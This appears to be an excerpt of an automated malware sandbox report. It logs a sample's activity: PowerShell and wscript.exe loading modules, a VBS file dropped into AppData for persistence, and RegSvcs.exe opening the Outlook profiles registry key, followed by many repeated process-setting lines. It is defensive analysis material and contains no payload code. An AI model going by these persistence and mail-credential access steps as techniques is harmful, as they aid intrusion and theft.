                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00970698 push eax; ret 8_2_00970712
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00970698 push eax; ret 8_2_00970722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009706C8 push eax; ret 8_2_00970702
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_009706C8 push eax; ret 8_2_00970712
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00970718 push eax; ret 8_2_00970722
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00970708 push eax; ret 8_2_00970712
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00970728 push eax; ret 8_2_00970732
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0604FBCD push es; iretd 8_2_0604FBDC

                  Persistence and Installation Behavior

                  barindex
                  Windows Shell Script Host drops VBS files
                  Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\dirDChDJoZeRjid.vbsJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
